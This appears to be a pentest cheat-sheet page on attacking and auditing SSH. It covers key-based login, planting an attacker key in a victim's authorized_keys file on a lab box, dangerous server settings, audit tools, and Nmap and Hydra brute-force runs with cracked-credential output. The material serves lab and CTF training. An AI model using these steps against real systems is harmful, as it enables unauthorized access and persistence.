# SSH (22) [![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA) ## Service ``` service ssh start #Verification netstat -antp | grep sshd ``` ## Keys ### SSH Connection ``` chmod 600 id_rsa ssh -i id_rsa user@host -p port ``` ### Generate Keys ``` 0xSs0rZ@pico-2018-shell:~$ ssh-keygen -t rsa Generating public/private rsa key pair. Enter file in which to save the key (/home/0xSs0rZ/.ssh/id_rsa): Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in /home/0xSs0rZ/.ssh/id_rsa. Your public key has been saved in /home/0xSs0rZ/.ssh/id_rsa.pub. The key fingerprint is: SHA256:YPsf7PTkrxc7owo8NkyxQVnfL3ZOS3xf+YDmJNVcMR0 0xSs0rZ@pico-2018-shell The key's randomart image is: +---[RSA 2048]----+ | .o. E=| | .. . + .o| | o o o + | | . o + . ....| | . S . + ++*| | = . = .o**| | O + o ++| | . B = = | | +.==.o | +----[SHA256]-----+ 0xSs0rZ@pico-2018-shell:~$ cd /home/0xSs0rZ/.ssh 0xSs0rZ@pico-2018-shell:~/.ssh$ 0xSs0rZ@pico-2018-shell:~/.ssh$ ls id_rsa id_rsa.pub 0xSs0rZ@pico-2018-shell:~/.ssh$ cp id_rsa.pub ~/.ssh/authorized_keys 0xSs0rZ@pico-2018-shell:~/.ssh$ ssh -i id_rsa 0xSs0rZ@localhost The authenticity of host 'localhost (127.0.0.1)' can't be established. ECDSA key fingerprint is SHA256:1/2OUR2IggrhZwLysFuJlUZ169yf1BFVeTIDW8Fo5XU. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added 'localhost' (ECDSA) to the list of known hosts. picoCTF{quelquechose} ``` ### Authorized-Keys ``` # Atacker root@Host-001:~/Bureau/htb# cat traceback.pub ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDsgaUFHPKR6TQf7rXuPcaSXyujJaBUvFlPWCYDeVR5adR+bHOh508cgCn9HxC79hNCPtv1a+8uRdK/0Ana1GMa35F2ugEMtHzoAjQA3zdrDRu7GS1LL/VdGqa9PMn3jKOzV1FZJrrqxqfSMhOsLXMkFJatjiSAjV0tmd8AI16p7C8nIbFmVfVHp3sLyzeB3VN6dKtFpCiWmmrdMDv5Nta9Y2FCKL20vo+dQvpfZPSPn5SzZjbpv5ITiPUdaKB2e+E4dDihuFE/VubKEWM71ns5xUPRb3DB4o5NrH8iE68/5BBUu3OT9fmo6FTUg2WsJzTZOThQQrADRNISnY9zD642pUHuT33+3JHj9XTWyojl4QYQQKENvL+rY31eGtkrvQYBXIAOvZV9KL9CNVFQb9ix5V8vCGsrG8slOpW3RaIAyJ5tm+mnWPO+P23tsdQsOudYbQE1sNdQfN/zOEqMgcfZG/3g5REqqSOAA6w0xjoJThKpYtKUvUdk2vePWA0bGb8= root@Host-001 root@Host-001:~/Bureau/htb# # Victim webadmin@traceback:/home/webadmin/.ssh$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDsgaUFHPKR6TQf7rXuPcaSXyujJaBUvFlPWCYDeVR5adR+bHOh508cgCn9HxC79hNCPtv1a+8uRdK/0Ana1GMa35F2ugEMtHzoAjQA3zdrDRu7GS1LL/VdGqa9PMn3jKOzV1FZJrrqxqfSMhOsLXMkFJatjiSAjV0tmd8AI16p7C8nIbFmVfVHp3sLyzeB3VN6dKtFpCiWmmrdMDv5Nta9Y2FCKL20vo+dQvpfZPSPn5SzZjbpv5ITiPUdaKB2e+E4dDihuFE/VubKEWM71ns5xUPRb3DB4o5NrH8iE68/5BBUu3OT9fmo6FTUg2WsJzTZOThQQrADRNISnY9zD642pUHuT33+3JHj9XTWyojl4QYQQKENvL+rY31eGtkrvQYBXIAOvZV9KL9CNVFQb9ix5V8vCGsrG8slOpW3RaIAyJ5tm+mnWPO+P23tsdQsOudYbQE1sNdQfN/zOEqMgcfZG/3g5REqqSOAA6w0xjoJThKpYtKUvUdk2vePWA0bGb8= root@Host-001" >> authorized_keys > authorized_keys webadmin@traceback:/home/webadmin/.ssh$ # Connection root@Host-001:~/Bureau/htb# ssh -i traceback webadmin@10.10.10.181 ``` ### Pseudo-Terminal ``` ssh -t bandit18@localhost /bin/sh ``` ## SSL Encryption ``` echo pass | openssl s_client -quiet -connect localhost:30001 ``` ## Generate key ```shell-session ssh-keygen Generating public/private rsa key pair. Enter file in which to save the key (/home/parrot/.ssh/id_rsa): Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in /home/parrot/.ssh/id_rsa Our public key has been saved in /home/parrot/.ssh/id_rsa.pub The key fingerprint is: SHA256:...SNIP... parrot@parrot The key's randomart image is: +---[RSA 3072]----+ | o.. | | ...SNIP | | ...SNIP | | ...SNIP | | ...SNIP | | ...SNIP | | ...SNIP | | + +oo+o | +----[SHA256]-----+ ``` ## SSH with a key id\_rsa ``` [Apr 06, 2024 - 07:50:27 (EDT)] exegol-CPTS /workspace # chmod 600 id_rsa [Apr 06, 2024 - 07:52:03 (EDT)] exegol-CPTS /workspace # ssh -i id_rsa ceil@10.129.42.195 ``` ## Metasploit {% embed url="" %} ## Dangerous settings | **Setting** | **Description** | | ---------------------------- | ------------------------------------------- | | `PasswordAuthentication yes` | Allows password-based authentication. | | `PermitEmptyPasswords yes` | Allows the use of empty passwords. | | `PermitRootLogin yes` | Allows to log in as the root user. | | `Protocol 1` | Uses an outdated version of encryption. | | `X11Forwarding yes` | Allows X11 forwarding for GUI applications. | | `AllowTcpForwarding yes` | Allows forwarding of TCP ports. | | `PermitTunnel` | Allows tunneling. | | `DebianBanner yes` | Displays a specific banner when logging in. | ## CVE-2025-26465 The OpenSSH client contains a logic error between versions 6.8p1 to 9.9p1 (inclusive) that makes it vulnerable to an active MitM attack if the VerifyHostKeyDNS option is enabled {% embed url="" %} ``` nuclei -u yourHost.com -t template.yaml ``` ## CVE-2024-6387 - regreSSHion OpenSSH RCE {% embed url="" %} {% embed url="" %} {% embed url="" %} {% embed url="" %} ## SSH Audit ```shell-session $ git clone https://github.com/jtesta/ssh-audit.git && cd ssh-audit $ ./ssh-audit.py 10.129.14.132 ``` ## SSHumble ``` $ ./sshamble scan -o results.jsonl 192.168.0.0/24 $ ./sshamble analyze -o results-directory results.jsonl ``` {% embed url="" %} ## Change Authentication Method ```shell-session $ ssh -v cry0l1t3@10.129.14.132 OpenSSH_8.2p1 Ubuntu-4ubuntu0.3, OpenSSL 1.1.1f 31 Mar 2020 debug1: Reading configuration data /etc/ssh/ssh_config ...SNIP... debug1: Authentications that can continue: publickey,password,keyboard-interactive ``` For potential brute-force attacks, we can specify the authentication method with the SSH client option `PreferredAuthentications`. ```shell-session $ ssh -v cry0l1t3@10.129.14.132 -o PreferredAuthentications=password OpenSSH_8.2p1 Ubuntu-4ubuntu0.3, OpenSSL 1.1.1f 31 Mar 2020 debug1: Reading configuration data /etc/ssh/ssh_config ...SNIP... debug1: Authentications that can continue: publickey,password,keyboard-interactive debug1: Next authentication method: password cry0l1t3@10.129.14.132's password: ``` ## Bruteforce {% content-ref url="../brute-force/ssh-bruteforce" %} [ssh-bruteforce](https://0xss0rz.gitbook.io/0xss0rz/pentest/brute-force/ssh-bruteforce) {% endcontent-ref %} ### **Nmap** ``` [Apr 06, 2024 - 10:09:33 (EDT)] exegol-CPTS /workspace # nmap 10.129.202.20 -sV -p22 --script ssh-brute Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-06 10:09 EDT NSE: [ssh-brute] Trying username/password pair: root:root NSE: [ssh-brute] Trying username/password pair: admin:admin NSE: [ssh-brute] Trying username/password pair: administrator:administrator NSE: [ssh-brute] Trying username/password pair: webadmin:webadmin NSE: [ssh-brute] Trying username/password pair: sysadmin:sysadmin NSE: [ssh-brute] Trying username/password pair: netadmin:netadmin NSE: [ssh-brute] Trying username/password pair: guest:guest NSE: [ssh-brute] Trying username/password pair: user:user NSE: [ssh-brute] Trying username/password pair: web:web NSE: [ssh-brute] Trying username/password pair: test:test NSE: [ssh-brute] Trying username/password pair: root: NSE: [ssh-brute] Trying username/password pair: admin: NSE: [ssh-brute] Trying username/password pair: administrator: NSE: [ssh-brute] Trying username/password pair: webadmin: ``` ### **Hydra - See** [**Brute force - SSH**](https://0xss0rz.gitbook.io/0xss0rz/pentest/brute-force/ssh-bruteforce) ```shell-session $ hydra -L user.list -P password.list ssh://10.129.42.197 Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-01-10 15:03:51 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 25 login tries (l:5/p:5), ~2 tries per task [DATA] attacking ssh://10.129.42.197:22/ [22][ssh] host: 10.129.42.197 login: user password: password 1 of 1 target successfully completed, 1 valid password found ``` ## SSH on Windows Binaries: {% embed url="" %} Install SSH on Windows: {% embed url="" %} ## Execute command - Windows {% embed url="" %} ## [Earn Free Crypto / BTC with Cointiply](https://cointiply.com/r/pkZxp) [**Play Games Earn Cash Rewards**](https://cointiply.com/r/pkZxp)
## Interesting Books {% content-ref url="../../interesting-books" %} [interesting-books](https://0xss0rz.gitbook.io/0xss0rz/interesting-books) {% endcontent-ref %} {% hint style="info" %} **Disclaimer**: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you. {% endhint %} * [**Nmap Network Scanning**](https://www.amazon.fr/dp/0979958717?tag=0xss0rz-21)\ The official guide to the Nmap Security Scanner, a free and open source utility used by millions of people for network discovery, administration, and security auditing. From explaining port scanning basics for novices to detailing low-level packet crafting methods used by advanced hackers, this book by Nmap's original author suits all levels of security and networking professionals. * [**The Art of Network Penetration Testing**](https://www.amazon.fr/dp/1617296821)\ A guide to simulating an internal security breach. You’ll take on the role of the attacker and work through every stage of a professional pentest, from information gathering to seizing control of a system and owning the network. * [**Network Basics for Hackers**](https://www.amazon.fr/dp/B0BS3GZ1R9)\ The book offers one of the most complete and in-depth analyses of Wi-Fi and Bluetooth networks, then progresses through the various protocols such as DNS, ARP, SMTP, and others. ## Support this Gitbook I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it. [![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA) [![buymeacoffee](https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png)](https://buymeacoffee.com/0xss0rz)